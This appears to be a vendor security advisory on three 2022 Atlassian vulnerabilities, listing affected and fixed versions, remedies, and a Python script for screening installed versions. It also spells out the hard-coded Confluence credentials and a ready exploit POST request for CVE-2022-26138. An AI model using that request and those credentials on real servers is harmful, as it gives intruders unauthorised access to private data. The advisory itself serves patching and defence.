Atlassian released patches for three critical vulnerabilities (CVE-2022-26136, CVE-2022-26137, CVE-2022-26138). Two of the three flaws affect Confluence Server and Confluence Data Center as well as Bamboo, Bitbucket, Crowd, Crucible, Fisheye, and Jira; the third affects only Confluence Server and Data Center. Sound patch management software can prevent such attacks from occurring.
The vulnerabilities are tracked as CVE-2022-26136 (Arbitrary Servlet Filter Bypass), CVE-2022-26137 (Additional Servlet Filter Invocation), and CVE-2022-26138 (Default Login). A proof of concept (PoC) is available for CVE-2022-26138, "Questions For Confluence – Default Login". At the time of writing, no PoC is available for CVE-2022-26136 or CVE-2022-26137.
Technical Details for Atlassian Critical Vulnerabilities
CVE-2022-26136, CVE-2022-26137 – By sending a specially crafted HTTP request, an unauthenticated remote attacker may be able to exploit these flaws to bypass the authentication used by third-party apps, run arbitrary JavaScript code, and get around the cross-origin resource sharing (CORS) browser mechanism. The vendor has released a patch for these flaws.
CVE-2022-26138 – An unauthenticated remote attacker can exploit this vulnerability by using hard-coded credentials. As a result, the attacker obtains a login to Confluence and can access any page the confluence-users group has access to.
Uninstalling the Questions for Confluence app does not fix the vulnerability. Users should delete or disable the "disabledsystemuser" account or apply the vendor's patch.
Steps to Exploit CVE-2022-26138
These are the steps to exploit the critical vulnerability uncovered by Atlassian:
- Send a POST request to the "/dologin.action" endpoint.
- Add the POST data "os_username=disabledsystemuser&os_password=disabledsystemuser6708&login=Log+in&os_destination=%2Fhttpvoid.action".
- This POST request provides a login to the Confluence Server or Data Center instance.
POST /dologin.action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

os_username=disabledsystemuser&os_password=disabledsystemuser6708&login=Log+in&os_destination=%2Fhttpvoid.action
Affected versions for the critical vulnerabilities uncovered by Atlassian:
1. CVE-2022-26136, CVE-2022-26137:
- Atlassian Bamboo Server and Data Center Versions < 7.2.9, 8.0.x < 8.0.9, 8.1.x < 8.1.8, 8.2.x < 8.2.4
- Atlassian Bitbucket Server and Data Center Versions < 7.6.16, All versions 7.7.x through 7.16.x, 7.17.x < 7.17.8, All versions 7.18.x, 7.19.x < 7.19.5, 7.20.x < 7.20.2, 7.21.x < 7.21.2, 8.0.0, 8.1.0
- Atlassian Confluence Server and Data Center Versions < 7.4.17, All versions 7.5.x through 7.12.x, 7.13.x < 7.13.7, 7.14.x < 7.14.3, 7.15.x < 7.15.2, 7.16.x < 7.16.4, 7.17.x < 7.17.4, 7.18.0
- Atlassian Crowd Server and Data Center Versions < 4.3.8, 4.4.x < 4.4.2, 5.0.0
- Atlassian Crucible Versions < 4.8.10
- Atlassian Fisheye Versions < 4.8.10
- Atlassian Jira Server and Data Center Versions < 8.13.22, All versions 8.14.x through 8.19.x, 8.20.x < 8.20.10, All versions 8.21.x, 8.22.x < 8.22.4
Note: 8.22.4 is not affected by this CVE, but it contains an unrelated security bug.
- Atlassian Jira Service Management Server and Data Center Versions < 4.13.22, All versions 4.14.x through 4.19.x, 4.20.x < 4.20.10, All versions 4.21.x, 4.22.x < 4.22.4
2. CVE-2022-26138:
- Questions for Confluence App 2.7.34, 2.7.35, 3.0.2 for Confluence Server and Confluence Data Center
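The affected ranges above are easy to misread when screening an inventory by hand, so here is an added example (not code from the original post or from Atlassian) that encodes them as inclusive/exclusive version bounds and flags installed versions still exposed to CVE-2022-26136/CVE-2022-26137; the product keys, function names, and sample hostnames are assumptions of the example.

```python
"""Added example (not from the original post): decide whether an installed
Atlassian product version falls inside the CVE-2022-26136 / CVE-2022-26137
affected ranges listed on this page, so an asset inventory can be screened
offline. Ranges are transcribed from the page; product keys, function names
and the sample hostnames below are assumptions of this example."""
import re

def parse(version: str) -> tuple:
    """'7.13.7-beta1' -> (7, 13, 7); tuples compare lexicographically."""
    return tuple(int(p) for p in re.findall(r"\d+", version.split("-")[0]))

# (lower bound inclusive, upper bound exclusive); tuple comparison makes
# ("7.5", "7.13") cover every 7.5.x through 7.12.x release.
AFFECTED = {
    "bamboo": [("0", "7.2.9"), ("8.0", "8.0.9"), ("8.1", "8.1.8"), ("8.2", "8.2.4")],
    "bitbucket": [("0", "7.6.16"), ("7.7", "7.17"), ("7.17", "7.17.8"),
                  ("7.18", "7.19"), ("7.19", "7.19.5"), ("7.20", "7.20.2"),
                  ("7.21", "7.21.2"), ("8.0.0", "8.0.1"), ("8.1.0", "8.1.1")],
    "confluence": [("0", "7.4.17"), ("7.5", "7.13"), ("7.13", "7.13.7"),
                   ("7.14", "7.14.3"), ("7.15", "7.15.2"), ("7.16", "7.16.4"),
                   ("7.17", "7.17.4"), ("7.18.0", "7.18.1")],
    "jira": [("0", "8.13.22"), ("8.14", "8.20"), ("8.20", "8.20.10"),
             ("8.21", "8.22"), ("8.22", "8.22.4")],
}

def is_affected(product: str, version: str) -> bool:
    """True if version lies inside any affected range for the product."""
    v = parse(version)
    return any(parse(lo) <= v < parse(hi) for lo, hi in AFFECTED[product])

def screen(inventory):
    """Return the (host, product, version) entries that still need patching."""
    return [(h, p, ver) for h, p, ver in inventory if is_affected(p, ver)]

if __name__ == "__main__":
    # Constructed sample inventory; hostnames are placeholders.
    sample = [("wiki-01", "confluence", "7.13.6"), ("wiki-02", "confluence", "7.13.7"),
              ("jira-01", "jira", "8.21.1"), ("git-01", "bitbucket", "7.21.2"),
              ("ci-01", "bamboo", "8.2.3")]
    for host, product, ver in screen(sample):
        print(f"{host}: {product} {ver} is affected by CVE-2022-26136/26137")
```

Versions at or above the fixed release of a line (for example Confluence 7.13.7 or Bitbucket 7.21.2) fall outside every range and are reported as not affected.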
Solutions for the critical vulnerabilities uncovered by Atlassian:
1. CVE-2022-26136, CVE-2022-26137:
- Atlassian Bamboo Server and Data Center 7.2.x >= 7.2.9, 8.0.x >= 8.0.9, 8.1.x >= 8.1.8, 8.2.x >= 8.2.4, Versions >= 9.0.0
- Atlassian Bitbucket Server and Data Center 7.6.x >= 7.6.16 (LTS), 7.17.x >= 7.17.8 (LTS), 7.19.x >= 7.19.5, 7.20.x >= 7.20.2, 7.21.x >= 7.21.2 (LTS), 8.0.x >= 8.0.1, 8.1.x >= 8.1.1, Versions >= 8.2.0
- Atlassian Confluence Server and Data Center 7.4.x >= 7.4.17 (LTS), 7.13.x >= 7.13.7 (LTS), 7.14.x >= 7.14.3, 7.15.x >= 7.15.2, 7.16.x >= 7.16.4, 7.17.x >= 7.17.4, 7.18.x >= 7.18.1
- Atlassian Crowd Server and Data Center 4.3.x >= 4.3.8, 4.4.x >= 4.4.2, Versions >= 5.0.1
- Atlassian Crucible Versions >= 4.8.10
- Atlassian Fisheye Versions >= 4.8.10
- Atlassian Jira Server and Data Center 8.13.x >= 8.13.22 (LTS), 8.20.x >= 8.20.10 (LTS), 8.22.x >= 8.22.4, Versions >= 9.0.0
- Atlassian Jira Service Management Server and Data Center 4.13.x >= 4.13.22 (LTS), 4.20.x >= 4.20.10 (LTS), 4.22.x >= 4.22.4, Versions >= 5.0.0
Note: 4.22.5 contains a security vulnerability, so upgrade to 4.22.6.
2. CVE-2022-26138:
There are two solutions for this critical vulnerability found by Atlassian:
- Solution 1:
- Upgrade to Questions for Confluence App >= 2.7.38 (requires Confluence 6.13.18 through 7.16.2) or >= 3.0.5 (requires Confluence 7.16.3 and later).
Uninstalling the Questions for Confluence app will not fix this issue: after the app is uninstalled, the disabledsystemuser account is not automatically deleted.
- Solution 2:
- Delete or disable the "disabledsystemuser" account.
These are the remedies to avoid being exploited by the critical vulnerabilities uncovered by Atlassian.
SanerNow Advanced Vulnerability Management detects these vulnerabilities and fixes them. Use SanerNow to keep your systems updated and secure.